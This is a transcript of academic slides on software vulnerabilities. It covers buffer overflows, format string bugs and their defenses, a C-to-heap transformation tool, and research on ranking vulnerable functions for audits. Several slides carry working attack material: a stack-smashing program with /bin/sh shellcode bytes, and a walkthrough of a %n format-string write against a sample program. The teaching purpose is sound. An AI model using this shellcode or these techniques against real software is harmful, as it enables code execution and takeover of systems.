Software Vulnerabilities: Definition, Classification, and Prevention - PowerPoint PPT Presentation

About This Presentation
Title:

Software Vulnerabilities: Definition, Classification, and Prevention

Description:

Software Vulnerabilities: Definition, Classification, and Prevention Overview What are software vulnerabilities? Types of vulnerabilities Buffer Overflows Format ... – PowerPoint PPT presentation

Number of Views:197
Avg rating:3.0/5.0
Slides: 116
Provided by: spirosma
Transcript and Presenter's Notes

Title: Software Vulnerabilities: Definition, Classification, and Prevention


1
Software Vulnerabilities: Definition,
Classification, and Prevention
2
Overview
  • What are software vulnerabilities?
  • Types of vulnerabilities
  • Buffer Overflows
  • Format String Vulnerabilities
  • How to find these vulnerabilities and prevent
    them?
  • Classes of software vulnerabilities

3
What Are Software Vulnerabilities?
  • A software vulnerability is an instance of a
    fault in the specification, development, or
    configuration of software such that its execution
    can violate the (implicit or explicit) security
    policy.

4
Types of Software Vulnerabilities
  • Buffer overflows
  • Smash the stack
  • Overflows in setuid regions
  • Heap overflows
  • Format string vulnerabilities

5
Buffer Overflows
  • Definition, Examples, and Defenses

6
What is a Buffer?
  • Example
  • A place on a form to fill in last name where each
    character has one box.
  • "Buffer" is used loosely to refer to any area of
    memory where more than one piece of data is stored.

7
Buffer Overflows [5]
  • The most common form of security vulnerability in
    the last 10 years
  • 1998: 2 out of 5 remote-to-local attacks in the
    Lincoln Labs Intrusion Detection Evaluation were
    buffer overflows.
  • 1998: 9 out of 13 CERT advisories involved buffer
    overflows.
  • 1999: at least 50% of CERT advisories involved
    buffer overflows.

8
How Does a Buffer Overflow Happen?
  • Reading or writing past the end of the buffer →
    overflow
  • As a result, any data that is allocated near the
    buffer can be read and potentially modified
    (overwritten)
  • A password flag can be modified to log in as
    someone else.
  • A return address can be overwritten so that it
    jumps to arbitrary code that the attacker
    injected (smash the stack) → attacker can control
    the host.
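
The password-flag case above can be sketched without invoking undefined behavior by simulating memory as one flat byte array. The layout (an 8-byte buffer followed directly by a 1-byte flag) and the names `unchecked_copy` and `checked_copy` are assumptions made for illustration; a real compiler decides the actual layout.

```c
#include <stddef.h>
#include <string.h>

/* Simulated memory: bytes 0..7 are the "buffer", byte 8 is the flag.
 * This layout is assumed for illustration only. */
enum { BUF_SIZE = 8, FLAG_OFFSET = 8, MEM_SIZE = 16 };

/* Unchecked copy: writes len bytes starting at the buffer, even when
 * len exceeds BUF_SIZE (the caller must keep len <= MEM_SIZE). */
void unchecked_copy(unsigned char mem[MEM_SIZE], const char *input, size_t len)
{
    memcpy(mem, input, len);
}

/* Checked copy: refuses any input that does not fit in the buffer.
 * Returns 0 on success, -1 if the input was rejected. */
int checked_copy(unsigned char mem[MEM_SIZE], const char *input, size_t len)
{
    if (len > BUF_SIZE)
        return -1;
    memcpy(mem, input, len);
    return 0;
}
```

With a 9-byte input, the unchecked version changes the simulated flag while the checked version leaves it untouched.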

9
Two Steps
  • Step 1: arrange for suitable code to be available
    in the program's address space (buffer), either by
      • injecting the code, or
      • using code that is already in the program
  • Step 2: overflow the buffer so that the program
    jumps to that code.

10
Inject the Code
  • Use a string as input to the program which is
    then stored in a buffer.
  • String contains bytes that are native CPU
    instructions for attacked platform.
  • Buffer can be located on the stack, heap, or in
    static data area.

11
Code Already in Program
  • Only need to parameterize the code and cause the
    program to jump to it.
  • Example
  • Code in libc that executes exec(arg), where arg
    is a string pointer argument, can be used to
    point to /bin/sh and jump to appropriate
    instructions in libc library.

12
Jump to Attack Code
  • Activation record
  • stack smashing attack
  • Function pointer
  • longjmp(3) buffer

13
Memory Regions [4]
14
Code/text Segment
  • Static
  • Contains code (instructions) and read-only data
  • Corresponds to text section of executable file
  • An attempt to write to this region → segmentation
    violation

15
Data Segment
  • Permanent data with statically known size
  • Both initialized and uninitialized variables
  • Corresponds to the data and bss sections of the
    executable file
  • brk(2) system call can change data segment size
  • Not enough available memory → process is blocked
    and rescheduled with larger memory

16
Heap
  • Dynamic memory allocation
  • malloc() in C and new in C++ → more flexibility
  • More stable data storage: memory allocated in
    the heap remains in existence for the duration of
    a program
  • Data with unknown lifetime: global (storage
    class external) and static variables

17
Stack I [3]
  • Provides high-level abstraction
  • Allocates local variables when a function gets
    called (with known lifetime)
  • Passes parameters to functions
  • Returns values from functions
  • Push/Pop operations (LIFO) implemented by CPU
  • Size dynamically adjusted by kernel at runtime

18
Stack II
  • Stack Pointer (SP): TOP of stack (or next free
    available address)
  • Fixed address: BOTTOM of stack
  • Logical Stack Frame (SF): contains parameters to
    functions, local variables, data to recover
    previous SF (e.g., instruction pointer at time of
    function call)
  • Frame Pointer (FP)/local Base Pointer (BP):
    beginning of Activation Record (AR), used for
    referencing local variables and parameters
    (accessed as offsets from BP)

19
Activation Record [5]
  • Contains all info local to a single invocation of
    a procedure
  • Return address
  • Arguments
  • Return value
  • Local variables
  • Temp data
  • Other control info

20
Accessing an Activation Record (AR)
  • Base pointer: beginning of AR
  • Arguments are accessed as offsets from bp
  • Environment pointer: pointer to the most recent
    AR (usually a fixed offset from bp)
  • Stack pointer: top of AR stack
  • Temporaries are allocated on top of the stack

21
When a Procedure is Called
  • Previous FP is saved
  • SP is copied into FP → new FP
  • SP advances to reserve space for local variables
  • Upon procedure exit, the stack is cleaned up

22
Function Pointer
  • Find a buffer adjacent to function pointer in
    stack, heap or static data area
  • Overflow buffer to change the function pointer so
    it jumps to desired location
  • Example: attack against the superprobe program (Linux)

23
Longjmp Buffer
  • setjmp(buffer) to set a checkpoint
  • longjmp(buffer) to go back to checkpoint
  • Corrupt state of buffer so that longjmp(buffer)
    jumps to the attack code instead
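
For context, the legitimate checkpoint pattern that this attack corrupts looks roughly like the sketch below. The names `checkpoint`, `risky_step`, and `run_with_checkpoint` are hypothetical; only `setjmp` and `longjmp` come from the standard library. The `jmp_buf` holds the saved execution context, which is why overwriting it redirects control.

```c
#include <setjmp.h>

static jmp_buf checkpoint;          /* saved execution context */

/* Hypothetical worker: jumps back to the checkpoint on failure. */
static void risky_step(int fail)
{
    if (fail)
        longjmp(checkpoint, 1);     /* resume at the setjmp call site */
}

/* Returns 0 when risky_step completes normally,
 * 1 when control came back through longjmp. */
int run_with_checkpoint(int fail)
{
    if (setjmp(checkpoint) != 0)
        return 1;                   /* arrived here via longjmp */
    risky_step(fail);
    return 0;
}
```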

24
Example
  • pushl $3
  • pushl $2
  • pushl $1
  • call function
  • pushl %ebp
  • movl %esp,%ebp
  • subl $20,%esp
  • void function(int a, int b, int c) {
  •   char buffer1[5];
  •   char buffer2[10];
  • }
  • void main() {
  •   function(1,2,3);
  • }

25
Buffer Overflow Example
  • void function(int a, int b, int c) {
  •   char buffer1[5];
  •   char buffer2[10];
  •   int *ret;
  •   ret = buffer1 + 12;
  •   (*ret) += 8;
  • }
  • void main() {
  •   int x;
  •   x = 0;
  •   function(1,2,3);
  •   x = 1;
  •   printf("%d\n",x);
  • }

26
Result of Program
  • Output: 0
  • Return address has been modified and the flow of
    execution has been changed
  • All we need to do is place the code that we are
    trying to execute in the buffer we are
    overflowing, and modify the return address so it
    points back to buffer

27
Example [6]
  • char shellcode[] =
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  • char large_string[128];
  • void main() {
  •   char buffer[96];
  •   int i;
  •   long *long_ptr = (long *) large_string;
      /* long_ptr takes the address of large_string */
  •   /* large_string is filled with 32 copies of
      the address of buffer */
  •   for (i = 0; i < 32; i++)
  •     *(long_ptr + i) = (int) buffer;
  •   /* copy the contents of shellcode into
      large_string */
  •   for (i = 0; i < strlen(shellcode); i++)
  •     large_string[i] = shellcode[i];
  •   /* buffer gets the shellcode and 32 pointers
      back to itself */
  •   strcpy(buffer, large_string);
  • }

28
Example Illustrated [6]
[Figure: process address space, showing the user stack (argc, RA, sfp, long_ptr, i, buffer), large_string[128] holding the shellcode, the heap, and bss]
29
Buffer Overflow Defenses
  • Writing correct code (good programming practices)
  • Debugging Tools
  • Non-executable buffers
  • Array bounds checking
  • Code pointer integrity checking (e.g., StackGuard)

30
Problems with C
  • Some C functions are problematic
  • Static size buffers
  • Do not have built-in bounds checking
  • While loops
  • Read one character at a time from user input
    until end of line or end of file
  • No explicit checks for overflows
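
A character-at-a-time loop becomes safe once the overflow check is explicit. The sketch below is one way to write it; `read_line_bounded` is a hypothetical helper name, and discarding the excess characters on an overlong line is a design choice made here, not something the slides prescribe.

```c
#include <stdio.h>
#include <stddef.h>

/* Reads one line from fp into buf, storing at most size - 1 characters
 * plus a terminating '\0'. Excess characters on the line are discarded.
 * Returns the number of characters stored. */
size_t read_line_bounded(FILE *fp, char *buf, size_t size)
{
    size_t n = 0;
    int c;

    if (size == 0)
        return 0;
    while ((c = fgetc(fp)) != EOF && c != '\n') {
        if (n + 1 < size)           /* explicit check before every store */
            buf[n++] = (char)c;
    }
    buf[n] = '\0';
    return n;
}
```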

31
Some Problematic C Functions [2]
Function | Severity | Solution: Use
gets | Most risky | fgets(buf, size, stdin)
strcpy, strcat | Very risky | strncpy, strncat
sprintf, vsprintf | Very risky | snprintf, vsnprintf, or precision specifiers
scanf family | Very risky | precision specifiers or do own parsing
realpath, syslog | Very risky (depending on implementation) | MAXPATHLEN and manual checks
getopt, getopt_long, getpass | Very risky (depending on implementation) | Truncate string inputs to reasonable size
32
Good Programming Practices I
DO NOT USE:
  void main() { char buf[40]; gets(buf); }
Instead USE:
  void main() { char buf[40]; fgets(buf, 40, stdin); }
33
Good Programming Practices II
DO NOT USE:
  void main() { char buf[4]; char src[8] = "rrrrr"; strcpy(buf, src); }
Instead USE:
  if (src_size > buf_size) { cout << "error"; return(1); }
  else { strcpy(buf, src); }
OR:
  strncpy(buf, src, buf_size - 1);
  buf[buf_size - 1] = '\0';
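
The strncpy variant above can be wrapped in a small helper so the termination step is never forgotten. This is a minimal sketch; `copy_bounded` is a hypothetical name, and reporting truncation through the return value is an added convenience rather than part of the slide.

```c
#include <stddef.h>
#include <string.h>

/* Copies src into dst (capacity dst_size) and always NUL-terminates.
 * Returns 0 if src fit completely, -1 if it was truncated
 * or if dst_size is 0. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return -1;
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';       /* strncpy does not guarantee this */
    return strlen(src) < dst_size ? 0 : -1;
}
```

Copying "rrrrr" into a 4-byte buffer with this helper stores "rrr" and reports truncation instead of writing past the end.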
34
Debugging Tools
  • More advanced debugging tools
  • Fault injection tools: inject deliberate buffer
    overflow faults at random to search for
    vulnerabilities
  • Static analysis tools: detect overflows
  • Can only minimize the number of overflow
    vulnerabilities but cannot provide total assurance

35
Non-executable Buffers [7,8]
  • Make the data segment of the program's address space
    non-executable → attacker can't execute code
    injected into input buffer (compromise between
    security and compatibility)

36
Non-executable Buffers [7,8]
  • If code already in program, attacks can bypass
    this defense method
  • Kernel patches (Linux and Solaris) make stack
    segment non-executable and preserve most program
    compatibility

37
Array Bounds Checking
  • Attempts to prevent overflow of code pointers
  • All reads and writes to arrays need to be checked
    to make sure they are within bounds (check most
    array references)
  • Compaq C compiler
  • Jones & Kelly array bounds checking
  • Purify memory access checking
  • Type-safe languages (e.g., Java)
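
What a bounds-checking compiler or runtime inserts automatically can be written by hand as a sketch. The helper names `checked_store` and `checked_load` are hypothetical; the point is only that every array reference is validated against the array length before it happens.

```c
#include <stdbool.h>
#include <stddef.h>

/* Stores value at arr[idx] only if idx is within bounds.
 * Returns true on success, false if the access was rejected. */
bool checked_store(int *arr, size_t len, size_t idx, int value)
{
    if (idx >= len)
        return false;
    arr[idx] = value;
    return true;
}

/* Loads arr[idx] into *out only if idx is within bounds. */
bool checked_load(const int *arr, size_t len, size_t idx, int *out)
{
    if (idx >= len)
        return false;
    *out = arr[idx];
    return true;
}
```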

38
Code Pointer Integrity Checking
  • Attempts to detect that a code pointer has been
    corrupted before it is de-referenced
  • Overflows that affect program state components
    other than code pointer will succeed
  • Offers advantages in performance, compatibility
    with existing code and implementation effort
  • Hand-coded stack introspection
  • StackGuard → PointGuard

39
StackGuard
  • Compiler technique that provides protection by
    checking the return address in AR
  • When it detects an attack → causes the app to exit,
    rather than yielding control to the attacker
  • Terminator canary
  • Random canary
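
The canary idea can be illustrated with a simulated activation record held in one flat byte array. This is a sketch of the concept, not StackGuard's actual compiler-generated code: the frame layout, the helper names, and the specific terminator bytes (NUL, CR, LF, 0xFF) are assumptions made for illustration.

```c
#include <stdint.h>
#include <string.h>

/* Simulated frame (layout assumed):
 * [ 8-byte buffer | 4-byte canary | 4-byte return address ] */
enum { BUF_LEN = 8, CANARY_OFF = 8, RET_OFF = 12, FRAME_LEN = 16 };

/* Terminator-style canary: bytes that string routines tend to stop at. */
static const unsigned char CANARY[4] = { 0x00, 0x0d, 0x0a, 0xff };

/* Function entry: place the canary below the saved return address. */
void frame_init(unsigned char frame[FRAME_LEN], uint32_t ret_addr)
{
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + CANARY_OFF, CANARY, sizeof CANARY);
    memcpy(frame + RET_OFF, &ret_addr, sizeof ret_addr);
}

/* Function exit: returns 1 if the canary is intact (safe to return),
 * 0 if it was overwritten (the program should exit instead). */
int frame_check(const unsigned char frame[FRAME_LEN])
{
    return memcmp(frame + CANARY_OFF, CANARY, sizeof CANARY) == 0;
}
```

An overflow that runs from the buffer up to the return address has to pass over the canary first, so the check at exit catches it.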

40
Heap Overflows
  • Harder to exploit, yet still common
  • Need to know which variables are security
    critical
  • Cause a buffer overflow to overwrite the target
    variables (generally buffer needs to have lower
    address)

41
Example
  • void main(int argc, char **argv) {
  •   char *super_user = (char *)malloc(sizeof(char)*9);
  •   char *str = (char *)malloc(sizeof(char)*4);
  •   char *tmp;
  •   super_user = super_user - 40;
  •   strcpy(super_user, "viega");
  •   if (argc > 1)
  •     strcpy(str, argv[1]);
  •   else
  •     strcpy(str,"xyz");
  •   tmp = str;
  •   while(tmp < super_user + 12) {
  •     printf("%p: %c (0x%x)\n", tmp, isprint(*tmp) ?
          *tmp : '?', (unsigned int)(*tmp));
  •     tmp += 1;
  •   }
  • }

42
Output
43
Output After Overflow
44
Format String Vulnerabilities I [9]
  • Caused by design misfeatures in the C standard
    library combined with problematic implementation
    (bad programming habits!)
  • printf family (syslog, printf, fprintf, sprintf,
    and snprintf): the format string tells the function
    the type and sequence of arguments to pop and the
    format for output
  • Hostile input can be passed directly as the
    format string for calls to printf functions

45
Format String Vulnerabilities II
  • Attacker can write arbitrary values to (almost
    any) arbitrary addresses in memory
  • Overwrite a stored UID for a program that drops
    and elevates privileges
  • Overwrite an executed command
  • Overwrite a return address so it points to a
    buffer with shell code in it
  • → OWN the program

46
Format String By Example: fmtme.c
  • int main(int argc, char **argv) {
  •   char buf[100];
  •   int x;
  •   if(argc != 2)
  •     exit(1);
  •   x = 1;
  •   snprintf(buf, sizeof buf, argv[1]);
  •   buf[sizeof buf - 1] = 0;
  •   printf("buffer (%d): %s\n", strlen(buf), buf);
  •   printf("x is %d/%#x (@ %p)\n", x, x, &x);
  •   return 0;
  • }

47
Stack Layout of Program
  • When snprintf function is called

48
Exploiting the Program I
  • Test 1
  • ./fmtme "hello world"
  • buffer (11): hello world
  • x is 1/0x1 (@ 0x804745c)

49
Exploiting the Program II
  • Test 2: print integers on the stack above the format
    string
  • ./fmtme "%x %x %x %x"
  • buffer (15): 1 f31 1031 3133
  • x is 1/0x1 (@ 0x804745c)
  • The 4 values of output are the variable x and three
    4-byte integers taken from the uninitialized buf
    variable

50
Exploiting the Program III
  • Test 3: control the values stored in the buffer
  • ./fmtme "aaaa %x %x"
  • buffer (15): aaaa 1 61616161
  • x is 1/0x1 (@ 0x804745c)
  • The 4 'a' characters we provided were copied to
    the start of the buffer and interpreted by
    snprintf as an integer argument with the value
    0x61616161 ('a' is 0x61 in ASCII)
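
The reinterpretation of four 'a' characters as one integer can be reproduced in isolation. In this sketch `bytes_as_u32` is a hypothetical helper; because all four bytes are identical, the result does not depend on the machine's byte order.

```c
#include <stdint.h>
#include <string.h>

/* Reinterprets four raw bytes as a 32-bit unsigned integer,
 * the same way a %x directive reads whatever bytes sit in the
 * argument slot it consumes. */
uint32_t bytes_as_u32(const char bytes[4])
{
    uint32_t value;
    memcpy(&value, bytes, sizeof value);
    return value;
}
```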

51
Exploiting the Program V
  • Test 4
  • ./fmtme "\x58\x74\x04\x08%d%n"
  • buffer (5): X1
  • x is 5/x05 (@ 0x8047458)

52
Exploiting the Program V (contd.)
  • snprintf copies the first 4 bytes into buf, scans
    the "%d" format and prints out the value of x,
    and reaches the "%n" directive
  • Pulls the next value off the stack, which comes
    from the first 4 bytes of buf. These 4 bytes have
    just been filled with "\x58\x74\x04\x08", or
    0x08047458
  • Writes the number of bytes output so far, 5, into
    this address

53
Solutions
  • Remove the %n feature
  • Permit Only Static Format Strings
  • Count the Arguments to printf
  • FormatGuard
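
The "static format strings only" rule is the one a programmer can apply directly: untrusted text is passed as an argument to a constant "%s" format, never as the format itself. A minimal sketch follows; `format_untrusted` is a hypothetical wrapper name.

```c
#include <stdio.h>
#include <stddef.h>

/* Copies untrusted text into buf through a constant format string.
 * Any % directives inside the text are treated as plain characters.
 * Returns what snprintf returns: the length the full output needs. */
int format_untrusted(char *buf, size_t size, const char *untrusted)
{
    return snprintf(buf, size, "%s", untrusted);
}
```

Had fmtme.c called snprintf this way, the inputs used in the tests above would simply have been echoed back.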

54
References
  • [1] https://www.cerias.Purdue.edu/techreports-ssl/public/98-09.pdf
  • [2] Building Secure Software, Viega and McGraw
  • [3] Smashing the Stack for Fun and Profit, Aleph
    One
  • [4] Stony Brook, State University of New York
    (http://www.cs.sunysb.edu/cse304)

55
References
  • [5] Buffer Overflows: Attacks and Defenses for
    the Vulnerability of the Decade
    (http://www.cse.ogi.edu/DISC/projects/immunix)
  • [6] www.cs.utexas.edu/users/deepakku/security/security.ppt
  • [7] http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/usenixsc98_html/node21.html

56
References
  • [8] http://docs.sun.com/db/doc/816-4883/6mb2joasj?a=view
  • [9] Format String Attacks, Tim Newsham, Guardent,
    Inc., 2000

57
Other Useful Resources
  • "How to Write Buffer Overflows" by "Mudge", 1997
  • "Stack Smashing Vulnerabilities in the UNIX
    Operating System" by Nathan P. Smith, 1997
  • "The Tao of Windows Buffer Overflows" by
    "DilDog", 1998

58
Gemini: Using Program Transformation to Secure C
Programs Against Buffer Overflows
59
Overview
  • Motivation
  • TXL
  • Transformation process
  • Case study results
  • Conclusion & future work

60
Motivation
  • Stack buffer overflows are the most common security
    vulnerability found in C code
  • The most popular e-mail, web and DNS software is
    open-source C code
  • Stack buffer overflows account for approx. 50% of
    security vulnerabilities since 1997

61
Motivation
  • Stack Buffer Overflows
      • Strings grow opposite of stack
      • Return address is above strings in memory
      • Overwriting a string can overwrite return address
  • Prevention
      • Transforming local arrays to pointer-to-arrays
        in a way that
          • Relieves the need for programmer intervention
          • Relieves the need for specific compilers
          • Minimizes run-time overhead

62
Stack Buffer Overflows
  • void func(char *str1, char *str2) {
  •   char buf[80];
  •   strcpy(buf, str1);
  • }

63
In a Nutshell
  • Transform every array that occurs in a function
    to a pointer
  • Preserve the original semantics
  • Both good and bad (where possible)
  • Pointer arithmetic should still work
  • Returning de-allocated memory should still work

64
In a Nutshell
Array → Pointer-to-Array
65
TXL
  • Text transformation tool
  • Provide TXL with an EBNF grammar, a set of
    transformations for that grammar and input text
  • Generates scanner and parser at run-time
  • After applying transformations, outputs resulting
    text
  • Strongly typed
  • Guarantees Syntactic equivalence, but not
    semantic equivalence

66
TXL
2001 J. Cordy
67
TXL example
  • Objective
  • Replace occurrences of strcpy(s1, s2) by
    strncpy(s1, s2, sizeof(s1))
  • TXL Rule

rule fixStrcpy Declarations [repeat compound_statement_body]
    replace [postfix_expression]
        strcpy '( ToBuf [unary_expression] ', FromBuf [argument_expression] ')
    where not
        Declarations [checkPointer ToBuf]
    by
        strncpy '( ToBuf ', FromBuf ', sizeof ToBuf ')
end rule
68
A Parse Tree
#include <stdio.h>
#include <string.h>
void main(int argc, char **argv) {
  char foo[5];
  char *ptr = strcpy(foo, argv[0]);
  printf("%s\n", ptr);
}
69
TXL Transformation
  • Assumptions
      • Globals, pointers, static and extern variables
        are not vulnerable to stack buffer overflows
      • We will only be given compilable C code
      • This is sometimes not the case with systems that
        use the autoconf package
  • Transformation Steps
      • Declaration expansion
      • typedef Flattening
      • Declaration Transformation
      • sizeof Alias Declarations
      • Add free and Transform return and sizeof
      • Initialization Functions

70
1. Declaration expansion
  • Makes transformation process easier

71
2. typedef Flattening
  • Removes type aliases
  • Distributes aliased array dimensions
  • Provides a way to differentiate statements from
    declarations
  • C is ambiguous about declarations and statements

72
Declaration/Statement Ambiguity
  • void main() {
  •   typedef char buf[5];
  •   buf (s);
  •   printf (s);
  • }
  • This ambiguity makes some pre-processing
    impossible

73
3. Declaration Transformation
  • Pre-process Variable Declarations
  • Adding parentheses around a declarator doesn't
    change the semantics, but it does change the
    syntax
  • Remove extraneous parentheses
  • Simplifies declarations
  • Groups array dimensions
  • Transform Arrays to Pointers
  • Generate Pointer Initialization

74
A. Pre-process Variable Declarations
Ambiguity parsing declarations: buf(s) and
printf(s) can result in the same parse tree
75
B. Transform Arrays to Pointers
  • Transform array declarations to pointer to
    array
  • Create an initialization function for each array
  • Create temporary variables to hold the original
    array sizes. In ISO C99, array sizes can be
    variable sized (an expression)

76
C. Generate Pointer Initialization
  • Replace the declaration with a pointer to an
    array, removing the initializer
  • Pointer initialization function
      • Generate a new declaration with a unique name
        and the same initializer
      • Create a function which contains calloc and
        memcpy
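
Applied by hand to a single array, the step above might produce something like the following sketch. The original declaration is assumed to be `char greeting[8] = "hi";`, and the names `greeting_init`, `init_greeting`, and `greeting_length` are hypothetical; the code the tool actually generates is not shown in the slides.

```c
#include <stdlib.h>
#include <string.h>

/* New declaration with a unique name and the original initializer. */
static const char greeting_init[8] = "hi";

/* Initialization function: allocates the array on the heap with calloc
 * and copies the initializer into it with memcpy.
 * The return type is "pointer to array of 8 char". */
static char (*init_greeting(void))[8]
{
    char (*p)[8] = calloc(1, sizeof *p);
    if (p != NULL)
        memcpy(*p, greeting_init, sizeof *p);
    return p;
}

/* Transformed function: the local array is now a pointer to an array,
 * so an overflow of it lands in the heap, not next to the return address. */
size_t greeting_length(void)
{
    char (*greeting)[8] = init_greeting();
    size_t n;

    if (greeting == NULL)
        return 0;
    n = strlen(*greeting);
    free(greeting);
    return n;
}
```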

77
4. sizeof Alias Declarations
  • sizeof allows for expressions, not just types
  • Memory assigned to a pointer is architecture
    dependent, always constant
  • Violates semantic preservation

78
sizeof Alias Declarations
  • Generate a new declaration with the original array
    dimensions to replace all sizeof references

79
5. Add free and Transform return and sizeof
  • Fix return statements and insert free statements
  • A return may reference a transformed array
  • If necessary, store expression in temporary
    variable, insert free statements for current
    scope, return temporary variable
  • 3 cases
  • End of scope without a return statement
  • return with an expression
  • return without an expression
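
The "return with an expression" case is the subtle one: the expression may read the transformed array, so it has to be evaluated before the array is freed. A hand-written sketch follows, assuming the original function declared `char buf[16]` and ended with `return buf[0];`. The names `first_byte` and `buf_size` are hypothetical.

```c
#include <stdlib.h>
#include <string.h>

int first_byte(const char *s)
{
    char (*buf)[16] = calloc(1, sizeof *buf);  /* was: char buf[16]; */
    const size_t buf_size = 16;   /* alias replacing sizeof(buf) */
    int result;

    if (buf == NULL)
        return -1;
    /* calloc zero-filled the array, so it stays NUL-terminated. */
    strncpy(*buf, s, buf_size - 1);

    result = (*buf)[0];   /* 1. store the return expression in a temporary */
    free(buf);            /* 2. free the arrays of the current scope */
    return result;        /* 3. return the temporary */
}
```

Without the `buf_size` alias, `sizeof(buf)` would now yield the size of a pointer instead of 16, which is the semantic change the sizeof alias step exists to prevent.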

80
Add free and Transform return and sizeof
  1. Fix return statements and insert free statements
  2. Fix sizeof constants

81
6. Insert Initialization Functions
  • Functions inserted at bottom of file, prototypes
    at top
  • Type flattening step removes possibility of a
    user defined type occurring in prototype, before
    actual declaration

82
Case Study Results (Most Recent)
Program | Arrays Fixed (KLoC) | Time Increase % (Δ run-time) | Regression Passed
apache | 226 (94) | 11.1 (0.001s) | N/A
bind | 2408 (298) | 0.5 (2.690s) | Yes
bison | 56 (21) | 1.8 (0.458s) | Yes
find | 47 (17) | 0 (0.000s) | Yes
flex | 29 (18) | 0 (0.000s) | N/A
openssh | 513 (56) | 4.3 (7.233s) | Yes
which | 2 (2) | 0 (0.000s) | N/A
whois | 7 (1) | 32.4 (0.153s) | N/A
83
Conclusions and Future work
  • Limitations & future work
      • Extend the transformation algorithm for struct
        declarations
      • Arrays of structs (done)
      • Arrays within structs (done)
  • Benefits
  • Current and future stack overflow attacks are
    guaranteed to fail when used against a
    transformed program

84
Characterizing the Security Vulnerability
Likelihood of Software Functions
85
Talk Outline
  • Section I
  • Manager/director detail
  • Why are we here?
  • Section II
  • User detail
  • What can we do?
  • Section III
  • Scientist detail
  • How do we do it?

86
What is a Software Security Vulnerability?
  • A software security vulnerability is a fault in
    the specification, implementation, or
    configuration of a software system whose
    execution can violate an explicit or implicit
    security policy.

87
Section I
  • Manager level detail
  • Software vulnerabilities are a problem: how can
    we avoid them?

88
How are software security vulnerabilities avoided?
  • Safe programming languages
  • Type safe languages
  • Adequate software design
  • Security Policies
  • Thorough testing
  • Testing with a high percentage of code coverage
  • Security auditing
  • Design
  • Implementation

89
Auditing for Software Security
  • Pre-release software development practices
    unlikely to change
  • Safe languages
  • Adequate software design
  • Thorough testing
  • Post-release auditing typically used if warranted

90
Security Auditing Issues
  • Large-scale auditing is infeasible due to code size
  • Good source code will have 1-3 bugs for every 100
    lines of code (Beizer)
  • Security auditors need to find the software
    security vulnerabilities in the bugs
  • Security audits would benefit from a tool that
    identifies areas that are likely vulnerable

91
Improving the Security Audit
  • Provide a tool built on statistical measurements
  • Cut down the amount of code needed to be reviewed
  • Ensure high degree of accuracy
  • Bottom line: complexity reduction

92
Section II
  • User level detail
  • How can our tools and research help the security
    auditor?

93
The FLF Hypothesis
  • Our hypothesis is that a small percentage of
    functions near a source of input are more likely
    to contain software security vulnerabilities
  • These functions are known as Front Line Functions

[Figure: an Input and three Front Line Functions (FLF)]
94
Front Line Functions
  • 60% code reduction
  • No auditor time required
  • High degree of accuracy

95
Discovering the FLF measurement
  • Collect software systems with known
    vulnerabilities
  • Perform detailed static analyses of software
    systems
  • Calculate areas of likely vulnerability from
    information gathered during static analyses
  • Build tools around these calculations

96
How are these tools used?
  • Run static analysis tools on source code
  • A database of code facts is created
  • The database is used to find the likely
    vulnerable functions
  • The likely vulnerable functions are outputted and
    ranked by proximity to input source

97
Case Study: OpenSSH
GOAL: FLF Finder identifies a large percentage of
modified functions
Code that was not changed between revisions
82% of changed functions identified by FLF Finder
98
Section III
  • Scientist level detail
  • What is the process for creating the likely
    vulnerable measurement?
  • How do we identify FLFs?

99
The FLF Hypothesis (revisited)
  • Our hypothesis is that a small percentage of
    functions near a source of input are more likely
    to contain software security vulnerabilities
  • These functions are known as Front Line Functions

[Figure: an Input and three Front Line Functions (FLF)]
100
Validating the FLF Hypothesis
  1. Gather a set of vulnerable software systems
    (Experimental Systems).
  2. Perform experiments on these systems with static
    analysis tools (GAST-MP & SGA)
  3. Identify all functions which initiate user input
    transactions (Inputs)
  4. Identify all functions which are vulnerable
    (Targets)
  5. Calculate FLF Density (FLF Density)
  6. Test the FLF Density on a set of control systems
    (Verification)
  7. Create a tool that utilizes the FLF Density (FLF
    Finder).

101
Experimental Systems
  • 30 open source systems
  • 31 software security vulnerabilities
  • Each system has a single patch file which
    addresses one security vulnerability
  • Most recovered from Red Hat's source RPM
    distribution due to their incremental nature

103
GAST-MP & SGA
  • GNU Abstract Syntax Tree Manipulation Program (
    GAST-MP )
  • Source Code Analysis tool
  • Operates on G++'s Abstract Syntax Tree (AST)
  • AST can be outputted with the fdump-tree-flag
  • Creates a repository of code facts
  • System Graph Analyzer ( SGA )
  • Operates on the code fact repository
  • Identifies Inputs and Targets
  • Performs invocation analysis
  • Calculates FLF Density
  • Analysis of Categorical Graphs

105
Finding Inputs
  • An Input is a function which reads in
    external user input
  • For example, read
  • A list of external function calls was compiled
    to properly identify Inputs
  • This list could be modified to contain
    application specific library calls
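
Conceptually, identifying Inputs comes down to checking each external call against that list. The sketch below is illustrative only: apart from `read`, which the slide names, the list entries and the function name `is_input_call` are assumptions, and the list actually used by the tools is not given here.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical list of external calls that read user input.
 * Only "read" is named in the slides; the rest are placeholders
 * that an application-specific list could replace or extend. */
static const char *const INPUT_CALLS[] = { "read", "recv", "fgets", "getenv" };

/* Returns 1 if name appears in the input-call list, 0 otherwise. */
int is_input_call(const char *name)
{
    size_t i;
    for (i = 0; i < sizeof INPUT_CALLS / sizeof INPUT_CALLS[0]; i++) {
        if (strcmp(name, INPUT_CALLS[i]) == 0)
            return 1;
    }
    return 0;
}
```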

107
Finding Targets
  • A Target is any function that contains a known
    vulnerability
  • Targets are found by matching code facts on
    subtractive lines in a patch file with code facts
    in the repository generated by GAST-MP

--- channels.c 27 Feb 2002 21:23:13 -0000 1.170
+++ channels.c 4 Mar 2002 19:37:58 -0000 1.171
@@ -146,7 +146,7 @@
  Channel *c;
- if (id < 0 || id > channels_alloc) {
+ if (id < 0 || id >= channels_alloc) {
  log("channel_lookup: %d: bad id", id);
  return NULL;
109
FLF Density
  1. Create entire call graph G
  2. Transform G into a DAG
  3. Label Input and Target Nodes
  4. Calculate invocation paths between Input and
    Target combinations and measure length
  5. Calculate FLF Density by normalizing path length
